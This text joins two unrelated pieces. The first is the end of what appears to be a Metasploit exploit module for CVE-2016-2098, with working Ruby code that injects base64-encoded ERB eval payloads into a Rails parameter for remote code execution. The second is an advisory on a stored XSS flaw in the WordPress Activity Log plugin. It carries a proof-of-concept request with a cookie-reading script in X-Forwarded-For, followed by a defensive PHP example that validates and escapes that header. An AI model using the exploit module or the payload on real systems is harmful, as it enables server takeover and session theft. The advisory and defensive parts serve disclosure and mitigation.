        inline request processor of the Ruby on Rails ActionPack component.
        This vulnerability allows an attacker to process ERB to the inline
        JSON processor, which is then rendered, permitting full RCE within
        the runtime, without logging an error condition.
      },
      'Author'         =>
        [
          'RageLtMan <rageltman[at]sempervictus>'
        ],
      'License'        => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2016-2098' ]
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        => [ ['Automatic', {} ] ],
      'DisclosureDate' => 'Mar 1 2016',
      'DefaultOptions' => {
        "PrependFork" => true
      },
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
      ], self.class)

  end

  def json_request
    code = Rex::Text.encode_base64(payload.encoded)
    return {
      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
    }.to_json
  end

  def exploit
    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
    send_request_cgi({
      'uri'     => normalize_uri(target_uri.path),
      'method'  => 'GET',
      'ctype'   => 'application/json',
      'headers' => {
        'Accept' => 'application/json'
      },
      'data'    => json_request
    }, 25)
  end
end
            
Persistent Cross-Site Scripting in WordPress Activity Log plugin
Han Sahin

Abstract

A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, typically a WordPress administrator.

Tested versions

This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.

Fix

This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.

Introduction

The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).

Details

The WordPress Activity Log plugin fails to sufficiently validate input supplied in the X-Forwarded-For HTTP header and does not perform output encoding when that input is presented in a "wrong password" event. As a result the malicious request is stored in the Activity Log page, and the payload executes when an unsuspecting user views that page.

An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or delivering malware.

Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).


Proof of concept

This vulnerability can be demonstrated by submitting an XFF header similar to the following:

POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close

log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1
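X-Forwarded-For is client-supplied text unless a trusted proxy overwrites it, so a log that records it as "the client IP" has to treat it as untrusted input. The following is an added example, not the Activity Log plugin's code: it validates the header value as an IP address before anything is stored (falling back to `REMOTE_ADDR` when nothing validates) and still HTML-encodes the stored value when rendering the log view. The function names `client_ip_from_xff()` and `esc_html_value()` are assumptions; the latter stands in for WordPress's `esc_html()`. The sample header values are constructed; the last one is the advisory's payload.

```php
<?php
// Added example (not the WordPress Activity Log plugin's code). Shows the two
// defences a logging feature needs for a spoofable header: validate what is
// stored, and encode what is displayed.

// Constructed X-Forwarded-For values; the last one is the advisory's payload.
$samples = [
    '203.0.113.10',
    '203.0.113.10, 10.0.0.1',
    '2001:db8::1',
    '<script>alert(document.cookie);</script>',
];

// Returns the first syntactically valid IP address in an X-Forwarded-For
// value, or null when nothing validates. Which position in the list to trust
// depends on the proxy chain in front of the site; the validation step is the
// same either way, and the header should only be honoured at all when the
// request actually arrived via a known proxy.
function client_ip_from_xff(?string $xff): ?string
{
    if ($xff === null || $xff === '') {
        return null;
    }
    foreach (explode(',', $xff) as $candidate) {
        $candidate = trim($candidate);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return null;
}

// Output encoding for the log view. Applied regardless of what was stored, so
// that a value that slipped past validation still cannot run as script.
function esc_html_value(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed REMOTE_ADDR for the fallback path.
$remote_addr = '198.51.100.7';

foreach ($samples as $xff) {
    $ip = client_ip_from_xff($xff);
    // Store a validated address, never the raw header text.
    $stored = $ip ?? $remote_addr;
    printf("XFF %-45s -> stored: %-22s rendered: %s\n",
        var_export($xff, true), $stored, esc_html_value($stored));
}

// Self-check: the payload must not survive into the stored value.
$tainted = client_ip_from_xff('<script>alert(document.cookie);</script>');
echo 'Payload accepted as IP: ' . ($tainted === null ? 'no' : 'yes') . "\n";
```

Storing a validated address removes the payload before it ever reaches the database, which also protects other consumers of the log (exports, e-mail digests, third-party dashboards) that might not encode on output themselves; the encoding on display remains the last line of defence for fields that legitimately hold free text.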